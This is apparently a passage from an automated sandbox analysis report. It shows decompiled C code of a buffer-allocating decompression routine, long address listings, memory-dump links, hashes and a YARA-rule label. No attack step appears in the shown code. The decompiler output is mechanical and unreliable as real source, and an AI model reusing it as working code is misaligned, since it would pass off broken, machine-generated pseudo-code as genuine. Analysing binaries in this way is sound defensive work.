													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                          0x00000000
                                          0x00406bc4
                                          0x00406bc4
                                          0x00406bc8
                                          0x00406be9
                                          0x00406bf0
                                          0x00406bf6
                                          0x00406bfc
                                          0x00406c0e
                                          0x00406c14
                                          0x00406c19
                                          0x00000000
                                          0x00406bca
                                          0x00406bd0
                                          0x00406f91
                                          0x00406f91
                                          0x00406f91
                                          0x00406f94
                                          0x00406f94
                                          0x00406f94
                                          0x00406f9a
                                          0x00406fa0
                                          0x00406fa6
                                          0x00406fc0
                                          0x00406fc3
                                          0x00406fc9
                                          0x00406fd4
                                          0x00406fd6
                                          0x00406fa8
                                          0x00406fa8
                                          0x00406fb7
                                          0x00406fbb
                                          0x00406fbb
                                          0x00406fe0
                                          0x00000000
                                          0x00000000
                                          0x00406fe2
                                          0x00406fe6
                                          0x00407195
                                          0x004071ab
                                          0x004071b3
                                          0x004071ba
                                          0x004071bc
                                          0x004071c3
                                          0x004071c7
                                          0x004071c7
                                          0x00406ff2
                                          0x00406ff9
                                          0x00407001
                                          0x00407004
                                          0x00407007
                                          0x00407007
                                          0x0040700d
                                          0x0040700d
                                          0x004067a9
                                          0x004067a9
                                          0x004067a9
                                          0x004067b2
                                          0x00000000
                                          0x00000000
                                          0x004067b8
                                          0x00000000
                                          0x004067c3
                                          0x00000000
                                          0x00000000
                                          0x004067cc
                                          0x004067cf
                                          0x004067d2
                                          0x004067d6
                                          0x00000000
                                          0x00000000
                                          0x004067dc
                                          0x004067df
                                          0x004067e1
                                          0x004067e2
                                          0x004067e5
                                          0x004067e7
                                          0x004067e8
                                          0x004067ea
                                          0x004067ed
                                          0x004067f2
                                          0x004067f7
                                          0x00406800
                                          0x00406813
                                          0x00406816
                                          0x00406822
                                          0x0040684a
                                          0x0040684c
                                          0x0040685a
                                          0x0040685a
                                          0x0040685e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040684e
                                          0x0040684e
                                          0x00406851
                                          0x00406852
                                          0x00406852
                                          0x00000000
                                          0x0040684e
                                          0x00406828
                                          0x0040682d
                                          0x0040682d
                                          0x00406836
                                          0x0040683e
                                          0x00406841
                                          0x00000000
                                          0x00406847
                                          0x00406847
                                          0x00000000
                                          0x00406847
                                          0x00000000
                                          0x00406864
                                          0x00406864
                                          0x00406868
                                          0x00407114
                                          0x00000000
                                          0x00407114
                                          0x00406871
                                          0x00406881
                                          0x00406884
                                          0x00406887
                                          0x00406887
                                          0x00406887
                                          0x0040688a
                                          0x0040688e
                                          0x00000000
                                          0x00000000
                                          0x00406890
                                          0x00406896
                                          0x004068c0
                                          0x004068c6
                                          0x004068cd
                                          0x00000000
                                          0x004068cd
                                          0x0040689c
                                          0x0040689f
                                          0x004068a4
                                          0x004068a4
                                          0x004068af
                                          0x004068b7
                                          0x004068ba
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004068ff
                                          0x00406905
                                          0x00406908
                                          0x00406915
                                          0x0040691d
                                          0x00000000
                                          0x00000000
                                          0x004068d4
                                          0x004068d4
                                          0x004068d8
                                          0x00407123
                                          0x00000000
                                          0x00407123
                                          0x004068e4
                                          0x004068ef
                                          0x004068ef
                                          0x004068ef
                                          0x004068f2
                                          0x004068f5
                                          0x004068f8
                                          0x004068fd
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406f94
                                          0x00406f94
                                          0x00406f9a
                                          0x00406fa0
                                          0x00406fa6
                                          0x00406fc0
                                          0x00406fc3
                                          0x00406fc9
                                          0x00406fd4
                                          0x00406fd6
                                          0x00406fa8
                                          0x00406fa8
                                          0x00406fb7
                                          0x00406fbb
                                          0x00406fbb
                                          0x00406fe0
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406925
                                          0x00406927
                                          0x0040692a
                                          0x0040699b
                                          0x0040699e
                                          0x004069a1
                                          0x004069a8
                                          0x004069b2
                                          0x00406f91
                                          0x00406f91
                                          0x00000000
                                          0x00406f91
                                          0x0040692c
                                          0x00406930
                                          0x00406933
                                          0x00406935
                                          0x00406938
                                          0x0040693b
                                          0x0040693d
                                          0x00406940
                                          0x00406942
                                          0x00406947
                                          0x0040694a
                                          0x0040694d
                                          0x00406951
                                          0x00406958
                                          0x0040695b
                                          0x00406962
                                          0x00406966
                                          0x0040696e
                                          0x0040696e
                                          0x0040696e
                                          0x00406968
                                          0x00406968
                                          0x00406968
                                          0x0040695d
                                          0x0040695d
                                          0x0040695d
                                          0x00406972
                                          0x00406975
                                          0x00406993
                                          0x00406995
                                          0x00000000
                                          0x00406977
                                          0x00406977
                                          0x0040697a
                                          0x0040697d
                                          0x00406980
                                          0x00406982
                                          0x00406982
                                          0x00406982
                                          0x00406985
                                          0x00406988
                                          0x0040698a
                                          0x0040698b
                                          0x0040698e
                                          0x00000000
                                          0x0040698e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406c2e
                                          0x00406c32
                                          0x00406c55
                                          0x00406c58
                                          0x00406c5b
                                          0x00406c65
                                          0x00406c34
                                          0x00406c34
                                          0x00406c37
                                          0x00406c3a
                                          0x00406c3d
                                          0x00406c4a
                                          0x00406c4d
                                          0x00406c4d
                                          0x00406f91
                                          0x00406f91
                                          0x00406f91
                                          0x00000000
                                          0x00406f91
                                          0x00000000
                                          0x00406c71
                                          0x00406c75
                                          0x00000000
                                          0x00000000
                                          0x00406c7b
                                          0x00406c7f
                                          0x00000000
                                          0x00000000
                                          0x00406c85
                                          0x00406c87
                                          0x00406c8b
                                          0x00406c8b
                                          0x00406c8e
                                          0x00406c92
                                          0x00000000
                                          0x00000000
                                          0x00406ce2
                                          0x00406ce6
                                          0x00406ced
                                          0x00406cf0
                                          0x00406cf3
                                          0x00406cfd
                                          0x00406f91
                                          0x00406f91
                                          0x00406f91
                                          0x00000000
                                          0x00406f91
                                          0x00406f91
                                          0x00406ce8
                                          0x00000000
                                          0x00000000
                                          0x00406d09
                                          0x00406d0d
                                          0x00406d14
                                          0x00406d17
                                          0x00406d1a
                                          0x00406d0f
                                          0x00406d0f
                                          0x00406d0f
                                          0x00406d1d
                                          0x00406d20
                                          0x00406d23
                                          0x00406d23
                                          0x00406d26
                                          0x00406d29
                                          0x00406d2c
                                          0x00406d2c
                                          0x00406d2f
                                          0x00406d36
                                          0x00406d3b
                                          0x00000000
                                          0x00000000
                                          0x00406dc9
                                          0x00406dc9
                                          0x00406dcd
                                          0x0040716b
                                          0x00000000
                                          0x0040716b
                                          0x00406dd3
                                          0x00406dd6
                                          0x00406dd9
                                          0x00406ddd
                                          0x00406de0
                                          0x00406de6
                                          0x00406de8
                                          0x00406de8
                                          0x00406de8
                                          0x00406deb
                                          0x00406dee
                                          0x00000000
                                          0x00000000
                                          0x004069be
                                          0x004069be
                                          0x004069c2
                                          0x0040712f
                                          0x00000000
                                          0x0040712f
                                          0x004069c8
                                          0x004069cb
                                          0x004069ce
                                          0x004069d2
                                          0x004069d5
                                          0x004069db
                                          0x004069dd
                                          0x004069dd
                                          0x004069dd
                                          0x004069e0
                                          0x004069e3
                                          0x004069e3
                                          0x004069e6
                                          0x004069e9
                                          0x00000000
                                          0x00000000
                                          0x004069ef
                                          0x004069f5
                                          0x00000000
                                          0x00000000
                                          0x004069fb
                                          0x004069fb
                                          0x004069ff
                                          0x00406a02
                                          0x00406a05
                                          0x00406a08
                                          0x00406a0b
                                          0x00406a0c
                                          0x00406a0f
                                          0x00406a11
                                          0x00406a17
                                          0x00406a1a
                                          0x00406a1d
                                          0x00406a20
                                          0x00406a23
                                          0x00406a26
                                          0x00406a29
                                          0x00406a45
                                          0x00406a48
                                          0x00406a4b
                                          0x00406a4e
                                          0x00406a55
                                          0x00406a59
                                          0x00406a5b
                                          0x00406a5f
                                          0x00406a2b
                                          0x00406a2b
                                          0x00406a2f
                                          0x00406a37
                                          0x00406a3c
                                          0x00406a3e
                                          0x00406a40
                                          0x00406a40
                                          0x00406a62
                                          0x00406a69
                                          0x00406a6c
                                          0x00000000
                                          0x00406a72
                                          0x00000000
                                          0x00406a72
                                          0x00000000
                                          0x00406a77
                                          0x00406a77
                                          0x00406a7b
                                          0x0040713b
                                          0x00000000
                                          0x0040713b
                                          0x00406a81
                                          0x00406a84
                                          0x00406a87
                                          0x00406a8b
                                          0x00406a8e
                                          0x00406a94
                                          0x00406a96
                                          0x00406a96
                                          0x00406a96
                                          0x00406a99
                                          0x00406a9c
                                          0x00406a9c
                                          0x00406a9c
                                          0x00406aa2
                                          0x00000000
                                          0x00000000
                                          0x00406aa4
                                          0x00406aa7
                                          0x00406aaa
                                          0x00406aad
                                          0x00406ab0
                                          0x00406ab3
                                          0x00406ab6
                                          0x00406ab9
                                          0x00406abc
                                          0x00406abf
                                          0x00406ac2
                                          0x00406ada
                                          0x00406add
                                          0x00406ae0
                                          0x00406ae3
                                          0x00406ae3
                                          0x00406ae6
                                          0x00406aea
                                          0x00406aec
                                          0x00406ac4
                                          0x00406ac4
                                          0x00406acc
                                          0x00406ad1
                                          0x00406ad3
                                          0x00406ad5
                                          0x00406ad5
                                          0x00406aef
                                          0x00406af6
                                          0x00406af9
                                          0x00000000
                                          0x00406afb
                                          0x00000000
                                          0x00406afb
                                          0x00406af9
                                          0x00406b00
                                          0x00406b00
                                          0x00406b00
                                          0x00406b00
                                          0x00000000
                                          0x00000000
                                          0x00406b3b
                                          0x00406b3b
                                          0x00406b3f
                                          0x00407147
                                          0x00000000
                                          0x00407147
                                          0x00406b45
                                          0x00406b48
                                          0x00406b4b
                                          0x00406b4f
                                          0x00406b52
                                          0x00406b58
                                          0x00406b5a
                                          0x00406b5a
                                          0x00406b5a
                                          0x00406b5d
                                          0x00406b60
                                          0x00406b60
                                          0x00406b66
                                          0x00406b04
                                          0x00406b04
                                          0x00406b07
                                          0x00000000
                                          0x00406b07
                                          0x00406b68
                                          0x00406b68
                                          0x00406b6b
                                          0x00406b6e
                                          0x00406b71
                                          0x00406b74
                                          0x00406b77
                                          0x00406b7a
                                          0x00406b7d
                                          0x00406b80
                                          0x00406b83
                                          0x00406b86
                                          0x00406b9e
                                          0x00406ba1
                                          0x00406ba4
                                          0x00406ba7
                                          0x00406ba7
                                          0x00406baa
                                          0x00406bae
                                          0x00406bb0
                                          0x00406b88
                                          0x00406b88
                                          0x00406b90
                                          0x00406b95
                                          0x00406b97
                                          0x00406b99
                                          0x00406b99
                                          0x00406bb3
                                          0x00406bba
                                          0x00406bbd
                                          0x00000000
                                          0x00406bbf
                                          0x00000000
                                          0x00406bbf
                                          0x00000000
                                          0x00406e4c
                                          0x00406e4c
                                          0x00406e50
                                          0x00407177
                                          0x00000000
                                          0x00407177
                                          0x00406e56
                                          0x00406e59
                                          0x00406e5c
                                          0x00406e60
                                          0x00406e63
                                          0x00406e69
                                          0x00406e6b
                                          0x00406e6b
                                          0x00406e6b
                                          0x00406e6e
                                          0x00000000
                                          0x00000000
                                          0x00406c1c
                                          0x00406c1c
                                          0x00406c1f
                                          0x00406f91
                                          0x00406f91
                                          0x00406f91
                                          0x00000000
                                          0x00406f91
                                          0x00000000
                                          0x00406f5b
                                          0x00406f5f
                                          0x00406f81
                                          0x00406f84
                                          0x00406f8e
                                          0x00406f91
                                          0x00406f91
                                          0x00406f91
                                          0x00000000
                                          0x00406f91
                                          0x00406f91
                                          0x00406f61
                                          0x00406f64
                                          0x00406f68
                                          0x00406f6b
                                          0x00406f6b
                                          0x00406f6e
                                          0x00000000
                                          0x00000000
                                          0x00407018
                                          0x0040701c
                                          0x0040703a
                                          0x0040703a
                                          0x0040703a
                                          0x00407041
                                          0x00407048
                                          0x0040704f
                                          0x0040704f
                                          0x00000000
                                          0x0040704f
                                          0x0040701e
                                          0x00407021
                                          0x00407024
                                          0x00407027
                                          0x0040702e
                                          0x00406f72
                                          0x00406f72
                                          0x00406f75
                                          0x00000000
                                          0x00000000
                                          0x00407109
                                          0x0040710c
                                          0x0040700d
                                          0x00000000
                                          0x00000000
                                          0x00406d43
                                          0x00406d45
                                          0x00406d4c
                                          0x00406d4d
                                          0x00406d4f
                                          0x00406d52
                                          0x00000000
                                          0x00000000
                                          0x00406d5a
                                          0x00406d5d
                                          0x00406d60
                                          0x00406d62
                                          0x00406d64
                                          0x00406d64
                                          0x00406d65
                                          0x00406d68
                                          0x00406d6f
                                          0x00406d72
                                          0x00406d80
                                          0x00000000
                                          0x00000000
                                          0x00407056
                                          0x00407056
                                          0x00407059
                                          0x00407060
                                          0x00000000
                                          0x00000000
                                          0x00407065
                                          0x00407065
                                          0x00407069
                                          0x004071a1
                                          0x00000000
                                          0x004071a1
                                          0x0040706f
                                          0x00407072
                                          0x00407075
                                          0x00407079
                                          0x0040707c
                                          0x00407082
                                          0x00407084
                                          0x00407084
                                          0x00407084
                                          0x00407087
                                          0x0040708a
                                          0x0040708a
                                          0x0040708a
                                          0x0040708a
                                          0x0040708d
                                          0x0040708d
                                          0x00407091
                                          0x004070f1
                                          0x004070f4
                                          0x004070f9
                                          0x004070fa
                                          0x004070fc
                                          0x004070fe
                                          0x00407101
                                          0x0040700d
                                          0x0040700d
                                          0x00000000
                                          0x00407013
                                          0x0040700d
                                          0x00407093
                                          0x00407099
                                          0x0040709c
                                          0x0040709f
                                          0x004070a2
                                          0x004070a5
                                          0x004070a8
                                          0x004070ab
                                          0x004070ae
                                          0x004070b1
                                          0x004070b4
                                          0x004070cd
                                          0x004070d0
                                          0x004070d3
                                          0x004070d6
                                          0x004070da
                                          0x004070dc
                                          0x004070dc
                                          0x004070dd
                                          0x004070e0
                                          0x004070b6
                                          0x004070b6
                                          0x004070be
                                          0x004070c3
                                          0x004070c5
                                          0x004070c8
                                          0x004070c8
                                          0x004070e3
                                          0x004070ea
                                          0x00000000
                                          0x004070ec
                                          0x00000000
                                          0x004070ec
                                          0x00000000
                                          0x00406d88
                                          0x00406d8b
                                          0x00406dc1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef4
                                          0x00406ef4
                                          0x00406ef7
                                          0x00406ef9
                                          0x00407183
                                          0x00000000
                                          0x00407183
                                          0x00406eff
                                          0x00406f02
                                          0x00000000
                                          0x00000000
                                          0x00406f08
                                          0x00406f0c
                                          0x00406f0f
                                          0x00406f0f
                                          0x00406f0f
                                          0x00000000
                                          0x00406f0f
                                          0x00406d8d
                                          0x00406d8f
                                          0x00406d91
                                          0x00406d93
                                          0x00406d96
                                          0x00406d97
                                          0x00406d99
                                          0x00406d9b
                                          0x00406d9e
                                          0x00406da1
                                          0x00406db7
                                          0x00406dbc
                                          0x00406df4
                                          0x00406df4
                                          0x00406df8
                                          0x00406e24
                                          0x00406e26
                                          0x00406e2d
                                          0x00406e30
                                          0x00406e33
                                          0x00406e33
                                          0x00406e38
                                          0x00406e38
                                          0x00406e3a
                                          0x00406e3d
                                          0x00406e44
                                          0x00406e47
                                          0x00406e74
                                          0x00406e74
                                          0x00406e77
                                          0x00406e7a
                                          0x00406eee
                                          0x00406eee
                                          0x00406eee
                                          0x00000000
                                          0x00406eee
                                          0x00406e7c
                                          0x00406e82
                                          0x00406e85
                                          0x00406e88
                                          0x00406e8b
                                          0x00406e8e
                                          0x00406e91
                                          0x00406e94
                                          0x00406e97
                                          0x00406e9a
                                          0x00406e9d
                                          0x00406eb6
                                          0x00406eb8
                                          0x00406ebb
                                          0x00406ebc
                                          0x00406ebf
                                          0x00406ec1
                                          0x00406ec4
                                          0x00406ec6
                                          0x00406ec8
                                          0x00406ecb
                                          0x00406ecd
                                          0x00406ed0
                                          0x00406ed4
                                          0x00406ed6
                                          0x00406ed6
                                          0x00406ed7
                                          0x00406eda
                                          0x00406edd
                                          0x00406e9f
                                          0x00406e9f
                                          0x00406ea7
                                          0x00406eac
                                          0x00406eae
                                          0x00406eb1
                                          0x00406eb1
                                          0x00406ee0
                                          0x00406ee7
                                          0x00406e71
                                          0x00406e71
                                          0x00406e71
                                          0x00406e71
                                          0x00000000
                                          0x00406ee9
                                          0x00000000
                                          0x00406ee9
                                          0x00406ee7
                                          0x00406dfa
                                          0x00406dfd
                                          0x00406dff
                                          0x00406e02
                                          0x00406e05
                                          0x00406e08
                                          0x00406e0a
                                          0x00406e0d
                                          0x00406e10
                                          0x00406e10
                                          0x00406e13
                                          0x00406e13
                                          0x00406e16
                                          0x00406e1d
                                          0x00406df1
                                          0x00406df1
                                          0x00406df1
                                          0x00406df1
                                          0x00000000
                                          0x00406e1f
                                          0x00000000
                                          0x00406e1f
                                          0x00406e1d
                                          0x00406da3
                                          0x00406da6
                                          0x00406da8
                                          0x00406dab
                                          0x00000000
                                          0x00000000
                                          0x00406b0a
                                          0x00406b0a
                                          0x00406b0e
                                          0x00407153
                                          0x00000000
                                          0x00407153
                                          0x00406b14
                                          0x00406b17
                                          0x00406b1a
                                          0x00406b1d
                                          0x00406b20
                                          0x00406b23
                                          0x00406b26
                                          0x00406b28
                                          0x00406b2b
                                          0x00406b2e
                                          0x00406b31
                                          0x00406b33
                                          0x00406b33
                                          0x00406b33
                                          0x00000000
                                          0x00000000
                                          0x00406c95
                                          0x00406c95
                                          0x00406c99
                                          0x0040715f
                                          0x00000000
                                          0x0040715f
                                          0x00406c9f
                                          0x00406ca2
                                          0x00406ca5
                                          0x00406ca8
                                          0x00406caa
                                          0x00406caa
                                          0x00406caa
                                          0x00406cad
                                          0x00406cb0
                                          0x00406cb3
                                          0x00406cb6
                                          0x00406cb9
                                          0x00406cbc
                                          0x00406cbd
                                          0x00406cbf
                                          0x00406cbf
                                          0x00406cbf
                                          0x00406cc2
                                          0x00406cc5
                                          0x00406cc8
                                          0x00406ccb
                                          0x00406ccb
                                          0x00406ccb
                                          0x00406cce
                                          0x00406cd0
                                          0x00406cd0
                                          0x00000000
                                          0x00000000
                                          0x00406f12
                                          0x00406f12
                                          0x00406f12
                                          0x00406f16
                                          0x00000000
                                          0x00000000
                                          0x00406f1c
                                          0x00406f1f
                                          0x00406f22
                                          0x00406f25
                                          0x00406f27
                                          0x00406f27
                                          0x00406f27
                                          0x00406f2a
                                          0x00406f2d
                                          0x00406f30
                                          0x00406f33
                                          0x00406f36
                                          0x00406f39
                                          0x00406f3a
                                          0x00406f3c
                                          0x00406f3c
                                          0x00406f3c
                                          0x00406f3f
                                          0x00406f42
                                          0x00406f45
                                          0x00406f48
                                          0x00406f4b
                                          0x00406f4f
                                          0x00406f51
                                          0x00406f54
                                          0x00000000
                                          0x00406f56
                                          0x00406cd3
                                          0x00406cd3
                                          0x00000000
                                          0x00406cd3
                                          0x00406f54
                                          0x00407189
                                          0x00000000
                                          0x00000000
                                          0x004067b8
                                          0x004071c0
                                          0x004071c0
                                          0x00000000
                                          0x004071c0
                                          0x0040700d
                                          0x00406f94
                                          0x00406f91
                                          0x00000000
                                          0x00406bc8

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a790c0330ad62cbb347795bf86deb23ec280a471c33d2e26a689dec21b6fd0bb
                                          • Instruction ID: 28a04b8f37ec13448d59bb684de8c36190a5ca9e173ef22aca7ace3c2f707fcc
                                          • Opcode Fuzzy Hash: a790c0330ad62cbb347795bf86deb23ec280a471c33d2e26a689dec21b6fd0bb
                                          • Instruction Fuzzy Hash: F2713471D04229CFDF28CF98C8447ADBBB1FB48305F15806AD846BB281C7386996DF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406CE2, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E00406CE2() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
